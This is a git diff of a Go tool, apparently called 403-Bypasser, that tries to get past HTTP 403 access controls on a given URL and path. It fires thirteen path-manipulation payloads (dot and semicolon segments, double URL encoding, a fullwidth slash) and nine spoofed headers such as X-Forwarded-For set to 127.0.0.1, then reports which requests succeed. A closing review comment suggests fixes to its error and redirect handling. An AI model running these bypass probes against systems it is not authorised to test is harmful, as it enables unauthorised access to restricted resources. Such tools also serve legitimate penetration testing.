commit
9c1edf9fc7
|
@ -0,0 +1,2 @@
|
||||||
|
fmt:
|
||||||
|
@gofmt -w -s main.go && goimports -w main.go && go vet main.go
|
196
main.go
196
main.go
|
@ -1,46 +1,21 @@
|
||||||
package main
|
package main
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"context"
|
||||||
"flag"
|
"flag"
|
||||||
"fmt"
|
"fmt"
|
||||||
"log"
|
"log"
|
||||||
"net/http"
|
"net/http"
|
||||||
"os"
|
"regexp"
|
||||||
|
"runtime"
|
||||||
"strings"
|
"strings"
|
||||||
|
"sync"
|
||||||
|
"time"
|
||||||
)
|
)
|
||||||
|
|
||||||
var Red = "\033[31m"
|
var (
|
||||||
var Green = "\033[32m"
|
reURL = regexp.MustCompile("^https?://")
|
||||||
var White = "\033[97m"
|
headerPayloads = []string{
|
||||||
|
|
||||||
func main() {
|
|
||||||
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
|
||||||
path := flag.String("path", "", "An endpoint. Example: admin")
|
|
||||||
flag.Parse()
|
|
||||||
|
|
||||||
if *domain == "" || *path == "" {
|
|
||||||
log.Fatalln("Using flag -url and -path")
|
|
||||||
os.Exit(0)
|
|
||||||
}
|
|
||||||
|
|
||||||
upperCase := strings.ToUpper(*path)
|
|
||||||
|
|
||||||
endpoint := []string{
|
|
||||||
*domain + "/" + upperCase,
|
|
||||||
*domain + "/" + *path + "/",
|
|
||||||
*domain + "/" + *path + "/.",
|
|
||||||
*domain + "//" + *path + "//",
|
|
||||||
*domain + "/./" + *path + "/./",
|
|
||||||
*domain + "/./" + *path + "/..",
|
|
||||||
*domain + "/;/" + *path,
|
|
||||||
*domain + "/.;/" + *path,
|
|
||||||
*domain + "//;//" + *path,
|
|
||||||
*domain + "/" + *path + "..;/",
|
|
||||||
*domain + "/%2e/" + *path,
|
|
||||||
*domain + "/%252e/" + *path,
|
|
||||||
*domain + "/%ef%bc%8f" + *path}
|
|
||||||
|
|
||||||
headers := []string{
|
|
||||||
"X-Custom-IP-Authorization",
|
"X-Custom-IP-Authorization",
|
||||||
"X-Originating-IP",
|
"X-Originating-IP",
|
||||||
"X-Forwarded-For",
|
"X-Forwarded-For",
|
||||||
|
@ -49,52 +24,127 @@ func main() {
|
||||||
"X-Host",
|
"X-Host",
|
||||||
"X-Forwarded-Host",
|
"X-Forwarded-Host",
|
||||||
"X-ProxyUser-Ip",
|
"X-ProxyUser-Ip",
|
||||||
"X-Remote-Addr"}
|
"X-Remote-Addr",
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
fmt.Println(Green, " _ _ ___ ____ ____ ")
|
const (
|
||||||
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ")
|
version string = "v1.1.0"
|
||||||
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ")
|
red string = "\033[31m"
|
||||||
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ")
|
green string = "\033[32m"
|
||||||
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ")
|
white string = "\033[97m"
|
||||||
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
|
|
||||||
fmt.Println(Green, " __/ | | ")
|
|
||||||
fmt.Println(Green, " |___/|_| v1.0.2", White)
|
|
||||||
|
|
||||||
fmt.Println("\nDomain:", *domain)
|
headerValue string = "127.0.0.1"
|
||||||
fmt.Println("Path:", *path)
|
)
|
||||||
|
|
||||||
fmt.Println("\nNormal Request")
|
func showBanner() {
|
||||||
for i, str := range endpoint {
|
fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
|
||||||
req, err := http.Get(str)
|
" _ _ ___ ____ ____\n",
|
||||||
if err != nil {
|
"| || | / _ \\___ \\ | _ \\\n",
|
||||||
log.Fatal(err)
|
"| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
|
||||||
}
|
"|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
|
||||||
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode))
|
" | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
|
||||||
if req.StatusCode == 200 {
|
" |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
|
||||||
fmt.Println(Green, i+1, output, White)
|
" __/ | |\n",
|
||||||
} else {
|
" |___/|_| ",
|
||||||
fmt.Println(Red, i+1, output, White)
|
version, white)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func getValidDomain(domain string) string {
|
||||||
|
trimmedDomain := strings.TrimSpace(domain)
|
||||||
|
|
||||||
|
if !reURL.MatchString(trimmedDomain) {
|
||||||
|
trimmedDomain = "https://" + trimmedDomain
|
||||||
}
|
}
|
||||||
|
|
||||||
fmt.Println("\nRequest with Headers")
|
return trimmedDomain
|
||||||
for j, head := range headers {
|
}
|
||||||
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
|
|
||||||
if err != nil {
|
|
||||||
log.Fatal(err)
|
|
||||||
}
|
|
||||||
req2.Header.Set(head, "127.0.0.1")
|
|
||||||
resp, err := http.DefaultClient.Do(req2)
|
|
||||||
if err != nil {
|
|
||||||
log.Fatal(err)
|
|
||||||
}
|
|
||||||
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
|
|
||||||
|
|
||||||
if resp.StatusCode == 200 {
|
func constructEndpointPayloads(domain, path string) []string {
|
||||||
fmt.Println(Green, j+1, output2, White)
|
return []string{
|
||||||
} else {
|
domain + "/" + strings.ToUpper(path),
|
||||||
fmt.Println(Red, j+1, output2, White)
|
domain + "/" + path + "/",
|
||||||
}
|
domain + "/" + path + "/.",
|
||||||
|
domain + "//" + path + "//",
|
||||||
|
domain + "/./" + path + "/./",
|
||||||
|
domain + "/./" + path + "/..",
|
||||||
|
domain + "/;/" + path,
|
||||||
|
domain + "/.;/" + path,
|
||||||
|
domain + "//;//" + path,
|
||||||
|
domain + "/" + path + "..;/",
|
||||||
|
domain + "/%2e/" + path,
|
||||||
|
domain + "/%252e/" + path,
|
||||||
|
domain + "/%ef%bc%8f" + path,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
defer wg.Done()
|
||||||
|
|
||||||
|
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var h string
|
||||||
|
if header != nil {
|
||||||
|
h = header[0]
|
||||||
|
req.Header.Set(h, headerValue)
|
||||||
|
}
|
||||||
|
|
||||||
|
resp, err := http.DefaultClient.Do(req)
|
||||||
|
if err != nil {
|
||||||
|
log.Fatal(err)
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
color := green
|
||||||
|
if resp.StatusCode != 200 {
|
||||||
|
color = red
|
||||||
|
}
|
||||||
|
|
||||||
|
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
runtime.GOMAXPROCS(1)
|
||||||
|
|
||||||
|
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
||||||
|
path := flag.String("path", "", "An endpoint. Example: admin")
|
||||||
|
flag.Parse()
|
||||||
|
|
||||||
|
if *domain == "" || *path == "" {
|
||||||
|
log.Fatalln("Using flag -url and -path")
|
||||||
|
}
|
||||||
|
|
||||||
|
validDomain := getValidDomain(*domain)
|
||||||
|
validPath := strings.TrimSpace(*path)
|
||||||
|
endpoints := constructEndpointPayloads(validDomain, validPath)
|
||||||
|
|
||||||
|
showBanner()
|
||||||
|
|
||||||
|
fmt.Println("\nDomain:", validDomain)
|
||||||
|
fmt.Println("Path:", validPath)
|
||||||
|
|
||||||
|
fmt.Println("\nNormal Request")
|
||||||
|
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
wg.Add(len(endpoints))
|
||||||
|
|
||||||
|
for _, e := range endpoints {
|
||||||
|
go penetrateEndpoint(&wg, e)
|
||||||
|
}
|
||||||
|
|
||||||
|
wg.Wait()
|
||||||
|
|
||||||
|
fmt.Println("\nRequest with Headers")
|
||||||
|
wg.Add(len(headerPayloads))
|
||||||
|
|
||||||
|
for _, h := range headerPayloads {
|
||||||
|
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
|
||||||
|
}
|
||||||
|
|
||||||
|
wg.Wait()
|
||||||
|
}
|
||||||
|
|
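Review bot: In `penetrateEndpoint`, both error paths call `log.Fatal(err)` from inside a goroutine, so a single timeout, DNS or TLS failure on one probe exits the whole process and discards the results of every request still in flight; the deferred `cancel()` and `wg.Done()` never run either. Report the failure and return instead, for example `log.Println(red, h, url, err, white)` followed by `return`, so the remaining checks complete and the run's coverage is known. Separately, `http.DefaultClient` follows redirects, so a protected path that redirects to a login page answering 200 would presumably be printed green; a client whose `CheckRedirect` returns `http.ErrUseLastResponse` would log the status the endpoint itself returned. `if header != nil` is also safer as `if len(header) > 0`, since an empty non-nil slice would make `header[0]` panic.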